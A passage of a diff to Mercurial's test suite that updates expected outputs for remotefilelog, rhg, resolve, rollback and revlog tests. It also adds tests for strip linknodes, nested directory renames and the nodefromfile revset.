# unbundle
@@ -133,13 +133,14 @@
adding changesets
adding manifests
adding file changes
- added 1 changesets with 0 changes to 0 files
+ added 1 changesets with 3 changes to 3 files
new changesets 19edf50f4de7 (1 drafts)
(run 'hg update' to get a working copy)
+ 2 files fetched over 1 fetches - (2 misses, 0.00% hit ratio) over *s (glob)
$ hg up
3 files updated, 0 files merged, 0 files removed, 0 files unresolved
- 4 files fetched over 1 fetches - (4 misses, 0.00% hit ratio) over *s (glob)
+ 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob)
$ cat a
a
@@ -148,7 +149,7 @@
$ clearcache
$ hg revert -r .~2 y z
no changes needed to z
- 2 files fetched over 2 fetches - (2 misses, 0.00% hit ratio) over *s (glob)
+ 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob)
$ hg checkout -C -r . -q
# explicit bundle should produce full bundle file
@@ -159,7 +160,7 @@
$ cd ..
$ hgcloneshallow ssh://user@dummy/master shallow2 -q
- 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob)
+ 2 files fetched over 1 fetches - (2 misses, 0.00% hit ratio) over *s (glob)
$ cd shallow2
$ hg unbundle ../local.bundle
adding changesets
--- a/tests/test-remotefilelog-log.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-remotefilelog-log.t Tue Apr 20 11:01:06 2021 -0400
@@ -30,6 +30,8 @@
exp-remotefilelog-repo-req-1
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
--- a/tests/test-remotefilelog-partial-shallow.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-remotefilelog-partial-shallow.t Tue Apr 20 11:01:06 2021 -0400
@@ -18,8 +18,10 @@
$ hg clone --shallow ssh://user@dummy/master shallow --noupdate --config remotefilelog.includepattern=foo
streaming all changes
- 3 files to transfer, 336 bytes of data
- transferred 336 bytes in * seconds (*/sec) (glob)
+ 3 files to transfer, 336 bytes of data (no-zstd !)
+ transferred 336 bytes in * seconds (* */sec) (glob) (no-zstd !)
+ 3 files to transfer, 338 bytes of data (zstd !)
+ transferred 338 bytes in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
$ cat >> shallow/.hg/hgrc <<EOF
--- a/tests/test-remotefilelog-prefetch.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-remotefilelog-prefetch.t Tue Apr 20 11:01:06 2021 -0400
@@ -22,8 +22,10 @@
$ hgcloneshallow ssh://user@dummy/master shallow --noupdate
streaming all changes
- 2 files to transfer, 528 bytes of data
- transferred 528 bytes in * seconds (*/sec) (glob)
+ 2 files to transfer, 528 bytes of data (no-zstd !)
+ transferred 528 bytes in * seconds (* */sec) (glob) (no-zstd !)
+ 2 files to transfer, 532 bytes of data (zstd !)
+ transferred 532 bytes in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
$ cd shallow
@@ -86,6 +88,7 @@
$ printf "[remotefilelog]\npullprefetch=bookmark()\n" >> .hg/hgrc
$ hg strip tip
saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/109c3a557a73-3f43405e-backup.hg (glob)
+ 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob)
$ clearcache
$ hg pull
@@ -163,8 +166,10 @@
$ hgcloneshallow ssh://user@dummy/master shallow2
streaming all changes
- 2 files to transfer, 528 bytes of data
- transferred 528 bytes in * seconds * (glob)
+ 2 files to transfer, 528 bytes of data (no-zstd !)
+ transferred 528 bytes in * seconds * (glob) (no-zstd !)
+ 2 files to transfer, 532 bytes of data (zstd !)
+ transferred 532 bytes in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
updating to branch default
@@ -180,7 +185,7 @@
x: untracked file differs
3 files fetched over 1 fetches - (3 misses, 0.00% hit ratio) over * (glob)
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ hg revert --all
# Test batch fetching of lookup files during hg status
--- a/tests/test-remotefilelog-sparse.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-remotefilelog-sparse.t Tue Apr 20 11:01:06 2021 -0400
@@ -22,8 +22,10 @@
$ hgcloneshallow ssh://user@dummy/master shallow --noupdate
streaming all changes
- 2 files to transfer, 527 bytes of data
- transferred 527 bytes in 0.* seconds (*/sec) (glob)
+ 2 files to transfer, 527 bytes of data (no-zstd !)
+ transferred 527 bytes in * seconds (* */sec) (glob) (no-zstd !)
+ 2 files to transfer, 534 bytes of data (zstd !)
+ transferred 534 bytes in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
$ cd shallow
@@ -48,6 +50,7 @@
$ printf "[remotefilelog]\npullprefetch=bookmark()\n" >> .hg/hgrc
$ hg strip tip
saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/876b1317060d-b2e91d8d-backup.hg (glob)
+ 2 files fetched over 2 fetches - (2 misses, 0.00% hit ratio) over *s (glob)
$ hg debugsparse --delete z
@@ -72,8 +75,10 @@
$ hgcloneshallow ssh://user@dummy/master shallow2
streaming all changes
- 2 files to transfer, 527 bytes of data
- transferred 527 bytes in 0.* seconds (*) (glob)
+ 2 files to transfer, 527 bytes of data (no-zstd !)
+ transferred 527 bytes in * seconds (*) (glob) (no-zstd !)
+ 2 files to transfer, 534 bytes of data (zstd !)
+ transferred 534 bytes in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
updating to branch default
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/test-remotefilelog-strip.t Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,68 @@
+#require no-windows
+
+ $ . "$TESTDIR/remotefilelog-library.sh"
+
+ $ hg init master
+ $ cd master
+ $ cat >> .hg/hgrc <<EOF
+ > [remotefilelog]
+ > server=True
+ > EOF
+ $ echo x > x
+ $ hg commit -qAm x
+
+ $ cd ..
+
+ $ hgcloneshallow ssh://user@dummy/master shallow -q
+ 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob)
+ $ cd shallow
+
+ $ cat >> $TESTTMP/get_file_linknode.py <<EOF
+ > from mercurial import node, registrar, scmutil
+ > cmdtable = {}
+ > command = registrar.command(cmdtable)
+ > @command(b'debug-file-linknode', [(b'r', b'rev', b'.', b'rev')], b'hg debug-file-linknode FILE')
+ > def debug_file_linknode(ui, repo, file, **opts):
+ > rflctx = scmutil.revsingle(repo.unfiltered(), opts['rev']).filectx(file)
+ > ui.status(b'%s\n' % node.hex(rflctx.ancestormap()[rflctx._filenode][2]))
+ > EOF
+
+ $ cat >> .hg/hgrc <<EOF
+ > [ui]
+ > interactive=1
+ > [extensions]
+ > strip=
+ > get_file_linknode=$TESTTMP/get_file_linknode.py
+ > [experimental]
+ > evolution=createmarkers,allowunstable
+ > EOF
+ $ echo a > a
+ $ hg commit -qAm msg1
+ $ hg commit --amend 're:^$' -m msg2
+ $ hg commit --amend 're:^$' -m msg3
+ $ hg --hidden log -G -T '{rev} {node|short}'
+ @ 3 df91f74b871e
+ |
+ | x 2 70494d7ec5ef
+ |/
+ | x 1 1e423846dde0
+ |/
+ o 0 b292c1e3311f
+
+ $ hg debug-file-linknode -r 70494d a
+ df91f74b871e064c89afa1fe9e2f66afa2c125df
+ $ hg --hidden strip -r 1 3
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/df91f74b871e-c94d67be-backup.hg
+
+ $ hg --hidden log -G -T '{rev} {node|short}'
+ o 1 70494d7ec5ef
+ |
+ @ 0 b292c1e3311f
+
+Demonstrate that the linknode points to a commit that is actually in the repo
+after the strip operation. Otherwise remotefilelog has to search every commit in
+the repository looking for a valid linkrev every time it's queried, such as
+during push.
+ $ hg debug-file-linknode -r 70494d a
+ 70494d7ec5ef6cd3cd6939a9fd2812f9956bf553
--- a/tests/test-remotefilelog-tags.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-remotefilelog-tags.t Tue Apr 20 11:01:06 2021 -0400
@@ -18,8 +18,10 @@
$ hg clone --shallow ssh://user@dummy/master shallow --noupdate --config remotefilelog.excludepattern=.hgtags
streaming all changes
- 3 files to transfer, 662 bytes of data
- transferred 662 bytes in * seconds (*/sec) (glob)
+ 3 files to transfer, 662 bytes of data (no-zstd !)
+ transferred 662 bytes in * seconds (* */sec) (glob) (no-zstd !)
+ 3 files to transfer, 665 bytes of data (zstd !)
+ transferred 665 bytes in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
$ cat >> shallow/.hg/hgrc <<EOF
--- a/tests/test-rename-dir-merge.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rename-dir-merge.t Tue Apr 20 11:01:06 2021 -0400
@@ -110,7 +110,7 @@
$ hg merge 2
b/c: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ cat b/c
target
but it should succeed if the content matches
@@ -294,3 +294,45 @@
M t/t
R a/s
R a/t
+
+ $ cd ..
+
+
+Test that files are moved to a new directory based on the path prefix that
+matches the most. dir1/ below gets renamed to dir2/, and dir1/subdir1/ gets
+renamed to dir2/subdir2/. We want dir1/subdir1/newfile to move to
+dir2/subdir2/ (not to dir2/subdir1/ as we would infer based on just the rename
+of dir1/ to dir2/).
+
+ $ hg init nested-renames
+ $ cd nested-renames
+ $ mkdir dir1
+ $ echo a > dir1/file1
+ $ echo b > dir1/file2
+ $ mkdir dir1/subdir1
+ $ echo c > dir1/subdir1/file3
+ $ echo d > dir1/subdir1/file4
+ $ hg ci -Aqm initial
+ $ hg mv dir1 dir2
+ moving dir1/file1 to dir2/file1
+ moving dir1/file2 to dir2/file2
+ moving dir1/subdir1/file3 to dir2/subdir1/file3
+ moving dir1/subdir1/file4 to dir2/subdir1/file4
+ $ hg mv dir2/subdir1 dir2/subdir2
+ moving dir2/subdir1/file3 to dir2/subdir2/file3
+ moving dir2/subdir1/file4 to dir2/subdir2/file4
+ $ hg ci -m 'move dir1/ to dir2/ and dir1/subdir1/ to dir2/subdir2/'
+ $ hg co 0
+ 4 files updated, 0 files merged, 4 files removed, 0 files unresolved
+ $ echo e > dir1/subdir1/file5
+ $ hg ci -Aqm 'add file in dir1/subdir1/'
+ $ hg merge 1
+ 5 files updated, 0 files merged, 4 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg files
+ dir2/file1
+ dir2/file2
+ dir2/subdir2/file3
+ dir2/subdir2/file4
+ dir2/subdir2/file5
+ $ cd ..
--- a/tests/test-repo-compengines.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-repo-compengines.t Tue Apr 20 11:01:06 2021 -0400
@@ -1,11 +1,19 @@
A new repository uses zlib storage, which doesn't need a requirement
+ $ cat << EOF >> $HGRCPATH
+ > [format]
+ > # stabilize test accross variant
+ > revlog-compression=zlib
+ > EOF
+
+
$ hg init default
$ cd default
$ cat .hg/requires
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
revlogv1
sparserevlog
store
@@ -54,6 +62,7 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
revlogv1
sparserevlog
store
@@ -72,6 +81,7 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
revlog-compression-zstd
revlogv1
sparserevlog
@@ -175,6 +185,7 @@
exp-compression-none
fncache
generaldelta
+ persistent-nodemap (rust !)
revlogv1
sparserevlog
store
--- a/tests/test-requires.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-requires.t Tue Apr 20 11:01:06 2021 -0400
@@ -5,7 +5,7 @@
$ hg commit -m test
$ rm .hg/requires
$ hg tip
- abort: unknown version (2) in revlog 00changelog.i
+ abort: unknown version (65535) in revlog 00changelog.i
[50]
$ echo indoor-pool > .hg/requires
$ hg tip
@@ -53,6 +53,8 @@
featuresetup-test
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
--- a/tests/test-resolve.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-resolve.t Tue Apr 20 11:01:06 2021 -0400
@@ -153,15 +153,15 @@
$ hg up 0
abort: outstanding merge conflicts
(use 'hg resolve' to resolve)
- [255]
+ [20]
$ hg merge 2
abort: outstanding merge conflicts
(use 'hg resolve' to resolve)
- [255]
+ [20]
$ hg merge --force 2
abort: outstanding merge conflicts
(use 'hg resolve' to resolve)
- [255]
+ [20]
set up conflict-free merge
@@ -255,11 +255,13 @@
ancestor path: file1 (node 2ed2a3912a0b24502043eae84ee4b279c18b90dd)
other path: file1 (node 6f4310b00b9a147241b071a60c28a650827fb03d)
extra: ancestorlinknode = 99726c03216e233810a2564cbc0adfe395007eac
+ extra: merged = yes
file: file2 (state "u")
local path: file2 (hash cb99b709a1978bd205ab9dfd4c5aaa1fc91c7523, flags "")
ancestor path: file2 (node 2ed2a3912a0b24502043eae84ee4b279c18b90dd)
other path: file2 (node 6f4310b00b9a147241b071a60c28a650827fb03d)
extra: ancestorlinknode = 99726c03216e233810a2564cbc0adfe395007eac
+ extra: merged = yes
$ hg resolve -l
R file1
U file2
@@ -271,7 +273,7 @@
{
"commits": [{"label": "working copy", "name": "local", "node": "57653b9f834a4493f7240b0681efcb9ae7cab745"}, {"label": "merge rev", "name": "other", "node": "dc77451844e37f03f5c559e3b8529b2b48d381d1"}],
"extras": [],
- "files": [{"ancestor_node": "2ed2a3912a0b24502043eae84ee4b279c18b90dd", "ancestor_path": "file1", "extras": [{"key": "ancestorlinknode", "value": "99726c03216e233810a2564cbc0adfe395007eac"}], "local_flags": "", "local_key": "60b27f004e454aca81b0480209cce5081ec52390", "local_path": "file1", "other_node": "6f4310b00b9a147241b071a60c28a650827fb03d", "other_path": "file1", "path": "file1", "state": "r"}, {"ancestor_node": "2ed2a3912a0b24502043eae84ee4b279c18b90dd", "ancestor_path": "file2", "extras": [{"key": "ancestorlinknode", "value": "99726c03216e233810a2564cbc0adfe395007eac"}], "local_flags": "", "local_key": "cb99b709a1978bd205ab9dfd4c5aaa1fc91c7523", "local_path": "file2", "other_node": "6f4310b00b9a147241b071a60c28a650827fb03d", "other_path": "file2", "path": "file2", "state": "u"}]
+ "files": [{"ancestor_node": "2ed2a3912a0b24502043eae84ee4b279c18b90dd", "ancestor_path": "file1", "extras": [{"key": "ancestorlinknode", "value": "99726c03216e233810a2564cbc0adfe395007eac"}, {"key": "merged", "value": "yes"}], "local_flags": "", "local_key": "60b27f004e454aca81b0480209cce5081ec52390", "local_path": "file1", "other_node": "6f4310b00b9a147241b071a60c28a650827fb03d", "other_path": "file1", "path": "file1", "state": "r"}, {"ancestor_node": "2ed2a3912a0b24502043eae84ee4b279c18b90dd", "ancestor_path": "file2", "extras": [{"key": "ancestorlinknode", "value": "99726c03216e233810a2564cbc0adfe395007eac"}, {"key": "merged", "value": "yes"}], "local_flags": "", "local_key": "cb99b709a1978bd205ab9dfd4c5aaa1fc91c7523", "local_path": "file2", "other_node": "6f4310b00b9a147241b071a60c28a650827fb03d", "other_path": "file2", "path": "file2", "state": "u"}]
}
]
@@ -344,6 +346,24 @@
$ hg resolve -l
R file1
R file2
+Test with :mergediff conflict markers
+ $ hg resolve --unmark
+ $ hg resolve --re-merge -t :mergediff file2
+ merging file2
+ warning: conflicts while merging file2! (edit, then use 'hg resolve --mark')
+ [1]
+ $ hg resolve -l
+ U file1
+ U file2
+ $ hg --config commands.resolve.mark-check=abort resolve -m
+ warning: the following files still have conflict markers:
+ file2
+ abort: conflict markers detected
+ (use --all to mark anyway)
+ [20]
+ $ hg resolve -l
+ U file1
+ U file2
Test option value 'warn'
$ hg resolve --unmark
$ hg resolve -l
--- a/tests/test-revlog-raw.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-revlog-raw.py Tue Apr 20 11:01:06 2021 -0400
@@ -51,10 +51,10 @@
def readprocessor(self, rawtext):
# True: the returned text could be used to verify hash
text = rawtext[len(_extheader) :].replace(b'i', b'1')
- return text, True, {}
+ return text, True
-def writeprocessor(self, text, sidedata):
+def writeprocessor(self, text):
# False: the returned rawtext shouldn't be used to verify hash
rawtext = _extheader + text.replace(b'1', b'i')
return rawtext, False
@@ -147,6 +147,7 @@
b'flags': rlog.flags(r),
b'deltabase': rlog.node(deltaparent),
b'delta': rlog.revdiff(deltaparent, r),
+ b'sidedata': rlog.sidedata(r),
}
def deltaiter(self):
@@ -159,10 +160,11 @@
deltabase = chunkdata[b'deltabase']
delta = chunkdata[b'delta']
flags = chunkdata[b'flags']
+ sidedata = chunkdata[b'sidedata']
chain = node
- yield (node, p1, p2, cs, deltabase, delta, flags)
+ yield (node, p1, p2, cs, deltabase, delta, flags, sidedata)
def linkmap(lnode):
return rlog.rev(lnode)
@@ -293,7 +295,7 @@
# Verify text, rawtext, and rawsize
if isext:
- rawtext = writeprocessor(None, text, {})[0]
+ rawtext = writeprocessor(None, text)[0]
else:
rawtext = text
if rlog.rawsize(rev) != len(rawtext):
--- a/tests/test-revlog-v2.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-revlog-v2.t Tue Apr 20 11:01:06 2021 -0400
@@ -22,8 +22,10 @@
$ cd empty-repo
$ cat .hg/requires
dotencode
- exp-revlogv2.1
+ exp-revlogv2.2
fncache
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
sparserevlog
store
--- a/tests/test-revlog.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-revlog.t Tue Apr 20 11:01:06 2021 -0400
@@ -22,10 +22,10 @@
Unknown version is rejected
>>> with open('.hg/store/00changelog.i', 'wb') as fh:
- ... fh.write(b'\x00\x00\x00\x02') and None
+ ... fh.write(b'\x00\x00\xbe\xef') and None
$ hg log
- abort: unknown version (2) in revlog 00changelog.i
+ abort: unknown version (48879) in revlog 00changelog.i
[50]
$ cd ..
--- a/tests/test-revset.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-revset.t Tue Apr 20 11:01:06 2021 -0400
@@ -3108,3 +3108,18 @@
$ log 'expectsize(0:2, :2)'
abort: revset size mismatch. expected between 0 and 2, got 3
[255]
+
+Test getting list of node from file
+
+ $ hg log -r '0:2' -T '{node}\n' > some.nodes
+ $ hg log -r 'nodefromfile("some.nodes")' -T '{rev}\n'
+ 0
+ 1
+ 2
+ $ hg log -r 'nodefromfile("missing-file")' -T '{rev}\n'
+ abort: cannot open nodes file "missing-file": $ENOENT$
+ [255]
+ $ echo bad-node > bad.nodes
+ $ hg log -r 'nodefromfile("bad.nodes")' -T '{rev}\n'
+ $ echo abcdefabcdefabcdeabcdeabcdeabcdeabcdeabc > missing.nodes
+
--- a/tests/test-rhg.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rhg.t Tue Apr 20 11:01:06 2021 -0400
@@ -1,43 +1,50 @@
-#require rust
+#require rhg
-Define an rhg function that will only run if rhg exists
- $ rhg() {
- > if [ -f "$RUNTESTDIR/../rust/target/release/rhg" ]; then
- > "$RUNTESTDIR/../rust/target/release/rhg" "$@"
- > else
- > echo "skipped: Cannot find rhg. Try to run cargo build in rust/rhg."
- > exit 80
- > fi
- > }
+ $ NO_FALLBACK="env RHG_ON_UNSUPPORTED=abort"
Unimplemented command
- $ rhg unimplemented-command
- error: Found argument 'unimplemented-command' which wasn't expected, or isn't valid in this context
+ $ $NO_FALLBACK rhg unimplemented-command
+ unsupported feature: error: Found argument 'unimplemented-command' which wasn't expected, or isn't valid in this context
USAGE:
- rhg <SUBCOMMAND>
+ rhg [OPTIONS] <SUBCOMMAND>
For more information try --help
+
+ [252]
+ $ rhg unimplemented-command --config rhg.on-unsupported=abort-silent
[252]
Finding root
- $ rhg root
+ $ $NO_FALLBACK rhg root
abort: no repository found in '$TESTTMP' (.hg not found)!
[255]
$ hg init repository
$ cd repository
- $ rhg root
+ $ $NO_FALLBACK rhg root
$TESTTMP/repository
+Reading and setting configuration
+ $ echo "[ui]" >> $HGRCPATH
+ $ echo "username = user1" >> $HGRCPATH
+ $ $NO_FALLBACK rhg config ui.username
+ user1
+ $ echo "[ui]" >> .hg/hgrc
+ $ echo "username = user2" >> .hg/hgrc
+ $ $NO_FALLBACK rhg config ui.username
+ user2
+ $ $NO_FALLBACK rhg --config ui.username=user3 config ui.username
+ user3
+
Unwritable file descriptor
- $ rhg root > /dev/full
+ $ $NO_FALLBACK rhg root > /dev/full
abort: No space left on device (os error 28)
[255]
Deleted repository
$ rm -rf `pwd`
- $ rhg root
+ $ $NO_FALLBACK rhg root
abort: error getting current working directory: $ENOENT$
[255]
@@ -52,7 +59,7 @@
> hg commit -m "commit $i" -q
Listing tracked files from root
- $ rhg files
+ $ $NO_FALLBACK rhg files
file1
file2
file3
@@ -60,13 +67,13 @@
Listing tracked files from subdirectory
$ mkdir -p path/to/directory
$ cd path/to/directory
- $ rhg files
+ $ $NO_FALLBACK rhg files
../../../file1
../../../file2
../../../file3
Listing tracked files through broken pipe
- $ rhg files | head -n 1
+ $ $NO_FALLBACK rhg files | head -n 1
../../../file1
Debuging data in inline index
@@ -79,20 +86,20 @@
> hg add file-$i
> hg commit -m "Commit $i" -q
> done
- $ rhg debugdata -c 2
+ $ $NO_FALLBACK rhg debugdata -c 2
8d0267cb034247ebfa5ee58ce59e22e57a492297
test
0 0
file-3
Commit 3 (no-eol)
- $ rhg debugdata -m 2
+ $ $NO_FALLBACK rhg debugdata -m 2
file-1\x00b8e02f6433738021a065f94175c7cd23db5f05be (esc)
file-2\x005d9299349fc01ddd25d0070d149b124d8f10411e (esc)
file-3\x002661d26c649684b482d10f91960cc3db683c38b4 (esc)
Debuging with full node id
- $ rhg debugdata -c `hg log -r 0 -T '{node}'`
+ $ $NO_FALLBACK rhg debugdata -c `hg log -r 0 -T '{node}'`
d1d1c679d3053e8926061b6f45ca52009f011e3f
test
0 0
@@ -108,16 +115,16 @@
cf8b83f14ead62b374b6e91a0e9303b85dfd9ed7
91c6f6e73e39318534dc415ea4e8a09c99cd74d6
6ae9681c6d30389694d8701faf24b583cf3ccafe
- $ rhg files -r cf8b83
+ $ $NO_FALLBACK rhg files -r cf8b83
file-1
file-2
file-3
- $ rhg cat -r cf8b83 file-2
+ $ $NO_FALLBACK rhg cat -r cf8b83 file-2
2
- $ rhg cat -r c file-2
- abort: ambiguous revision identifier c
+ $ $NO_FALLBACK rhg cat -r c file-2
+ abort: ambiguous revision identifier: c
[255]
- $ rhg cat -r d file-2
+ $ $NO_FALLBACK rhg cat -r d file-2
2
Cat files
@@ -128,50 +135,77 @@
$ echo "original content" > original
$ hg add original
$ hg commit -m "add original" original
- $ rhg cat -r 0 original
+ $ $NO_FALLBACK rhg cat -r 0 original
original content
Cat copied file should not display copy metadata
$ hg copy original copy_of_original
$ hg commit -m "add copy of original"
- $ rhg cat -r 1 copy_of_original
+ $ $NO_FALLBACK rhg cat -r 1 copy_of_original
+ original content
+
+Fallback to Python
+ $ $NO_FALLBACK rhg cat original
+ unsupported feature: `rhg cat` without `--rev` / `-r`
+ [252]
+ $ rhg cat original
original content
+ $ FALLBACK_EXE="$RHG_FALLBACK_EXECUTABLE"
+ $ unset RHG_FALLBACK_EXECUTABLE
+ $ rhg cat original
+ abort: 'rhg.on-unsupported=fallback' without 'rhg.fallback-executable' set.
+ [255]
+ $ RHG_FALLBACK_EXECUTABLE="$FALLBACK_EXE"
+ $ export RHG_FALLBACK_EXECUTABLE
+
+ $ rhg cat original --config rhg.fallback-executable=false
+ [1]
+
+ $ rhg cat original --config rhg.fallback-executable=hg-non-existent
+ tried to fall back to a 'hg-non-existent' sub-process but got error $ENOENT$
+ unsupported feature: `rhg cat` without `--rev` / `-r`
+ [252]
+
+ $ rhg cat original --config rhg.fallback-executable=rhg
+ Blocking recursive fallback. The 'rhg.fallback-executable = rhg' config points to `rhg` itself.
+ unsupported feature: `rhg cat` without `--rev` / `-r`
+ [252]
+
Requirements
- $ rhg debugrequirements
+ $ $NO_FALLBACK rhg debugrequirements
dotencode
fncache
generaldelta
+ persistent-nodemap
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
$ echo indoor-pool >> .hg/requires
- $ rhg files
+ $ $NO_FALLBACK rhg files
+ unsupported feature: repository requires feature unknown to this Mercurial: indoor-pool
[252]
- $ rhg cat -r 1 copy_of_original
+ $ $NO_FALLBACK rhg cat -r 1 copy_of_original
+ unsupported feature: repository requires feature unknown to this Mercurial: indoor-pool
[252]
- $ rhg debugrequirements
- dotencode
- fncache
- generaldelta
- revlogv1
- sparserevlog
- store
- indoor-pool
+ $ $NO_FALLBACK rhg debugrequirements
+ unsupported feature: repository requires feature unknown to this Mercurial: indoor-pool
+ [252]
$ echo -e '\xFF' >> .hg/requires
- $ rhg debugrequirements
- abort: .hg/requires is corrupted
+ $ $NO_FALLBACK rhg debugrequirements
+ abort: parse error in 'requires' file
[255]
Persistent nodemap
$ cd $TESTTMP
$ rm -rf repository
- $ hg init repository
+ $ hg --config format.use-persistent-nodemap=no init repository
$ cd repository
- $ rhg debugrequirements | grep nodemap
+ $ $NO_FALLBACK rhg debugrequirements | grep nodemap
[1]
$ hg debugbuilddag .+5000 --overwritten-file --config "storage.revlog.nodemap.mode=warn"
$ hg id -r tip
@@ -179,14 +213,14 @@
$ ls .hg/store/00changelog*
.hg/store/00changelog.d
.hg/store/00changelog.i
- $ rhg files -r c3ae8dec9fad
+ $ $NO_FALLBACK rhg files -r c3ae8dec9fad
of
$ cd $TESTTMP
$ rm -rf repository
$ hg --config format.use-persistent-nodemap=True init repository
$ cd repository
- $ rhg debugrequirements | grep nodemap
+ $ $NO_FALLBACK rhg debugrequirements | grep nodemap
persistent-nodemap
$ hg debugbuilddag .+5000 --overwritten-file --config "storage.revlog.nodemap.mode=warn"
$ hg id -r tip
@@ -198,7 +232,78 @@
.hg/store/00changelog.n
Specifying revisions by changeset ID
- $ rhg files -r c3ae8dec9fad
+ $ $NO_FALLBACK rhg files -r c3ae8dec9fad
of
- $ rhg cat -r c3ae8dec9fad of
+ $ $NO_FALLBACK rhg cat -r c3ae8dec9fad of
r5000
+
+Crate a shared repository
+
+ $ echo "[extensions]" >> $HGRCPATH
+ $ echo "share = " >> $HGRCPATH
+
+ $ cd $TESTTMP
+ $ hg init repo1
+ $ echo a > repo1/a
+ $ hg -R repo1 commit -A -m'init'
+ adding a
+
+ $ hg share repo1 repo2
+ updating working directory
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+
+And check that basic rhg commands work with sharing
+
+ $ $NO_FALLBACK rhg files -R repo2
+ repo2/a
+ $ $NO_FALLBACK rhg -R repo2 cat -r 0 repo2/a
+ a
+
+Same with relative sharing
+
+ $ hg share repo2 repo3 --relative
+ updating working directory
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+
+ $ $NO_FALLBACK rhg files -R repo3
+ repo3/a
+ $ $NO_FALLBACK rhg -R repo3 cat -r 0 repo3/a
+ a
+
+Same with share-safe
+
+ $ echo "[format]" >> $HGRCPATH
+ $ echo "use-share-safe = True" >> $HGRCPATH
+
+ $ cd $TESTTMP
+ $ hg init repo4
+ $ cd repo4
+ $ echo a > a
+ $ hg commit -A -m'init'
+ adding a
+
+ $ cd ..
+ $ hg share repo4 repo5
+ updating working directory
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+
+And check that basic rhg commands work with sharing
+
+ $ cd repo5
+ $ $NO_FALLBACK rhg files
+ a
+ $ $NO_FALLBACK rhg cat -r 0 a
+ a
+
+The blackbox extension is supported
+
+ $ echo "[extensions]" >> $HGRCPATH
+ $ echo "blackbox =" >> $HGRCPATH
+ $ echo "[blackbox]" >> $HGRCPATH
+ $ echo "maxsize = 1" >> $HGRCPATH
+ $ $NO_FALLBACK rhg files > /dev/null
+ $ cat .hg/blackbox.log
+ ????/??/?? ??:??:??.??? * @d3873e73d99ef67873dac33fbcc66268d5d2b6f4 (*)> (rust) files exited 0 after 0.??? seconds (glob)
+ $ cat .hg/blackbox.log.1
+ ????/??/?? ??:??:??.??? * @d3873e73d99ef67873dac33fbcc66268d5d2b6f4 (*)> (rust) files (glob)
+
--- a/tests/test-rollback.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rollback.t Tue Apr 20 11:01:06 2021 -0400
@@ -103,7 +103,7 @@
transaction abort!
rollback completed
abort: pretxncommit hook exited with status * (glob)
- [255]
+ [40]
$ cat .hg/last-message.txt ; echo
precious commit message
@@ -118,7 +118,7 @@
note: commit message saved in .hg/last-message.txt
note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it
abort: pretxncommit hook exited with status * (glob)
- [255]
+ [40]
$ cat .hg/last-message.txt
another precious commit message
@@ -380,7 +380,7 @@
warn during abort
rollback completed
abort: pretxncommit hook exited with status 1
- [255]
+ [40]
$ hg commit -m 'commit 1'
warn during pretxncommit
@@ -405,7 +405,7 @@
transaction abort!
rollback completed
abort: pretxncommit hook exited with status 1
- [255]
+ [40]
$ hg commit -m 'commit 1'
warn during pretxncommit
@@ -431,7 +431,7 @@
transaction abort!
warn during abort
abort: pretxncommit hook exited with status 1
- [255]
+ [40]
$ hg verify
checking changesets
--- a/tests/test-setdiscovery.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-setdiscovery.t Tue Apr 20 11:01:06 2021 -0400
@@ -1328,25 +1328,25 @@
updating to branch b
0 files updated, 0 files merged, 0 files removed, 0 files unresolved
- $ hg -R a debugdiscovery b --debug --verbose --config progress.debug=true --config devel.discovery.randomize=false
+ $ hg -R a debugdiscovery b --debug --verbose --config progress.debug=true --config devel.discovery.randomize=false --config devel.discovery.sample-size.initial=50
comparing with b
query 1; heads
searching for changes
taking quick initial sample
searching: 2 queries
- query 2; still undecided: 1080, sample size is: 100
